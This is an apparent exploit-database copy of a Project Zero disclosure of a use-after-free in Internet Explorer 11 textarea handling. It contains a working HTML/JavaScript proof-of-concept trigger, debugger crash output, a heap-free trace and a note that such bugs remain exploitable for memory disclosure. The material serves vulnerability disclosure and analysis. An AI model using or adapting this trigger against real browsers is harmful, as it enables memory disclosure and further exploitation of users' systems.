<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076
There is an use-after-free bug in IE which can lead to info leak / memory disclosure.
The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function run() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
alert("Text value freed, can be reallocated here");
}
</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>
<!--
=========================================
Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.
The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at
(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=????
0:008> k
# ChildEBP RetAddr
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b
where the old value was deleated at
0:008> !heap -p -a 0e024ffc
address 0e024ffc found in
_DPH_HEAP_ROOT @ f1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
dd03820: e024000 2000
7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
77b6de86 ntdll!RtlReAllocateHeap+0x00000054
71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
71678877 MSHTML!CBase::put_StringHelper+0x0000004d
71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.
Screenshots:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip
-->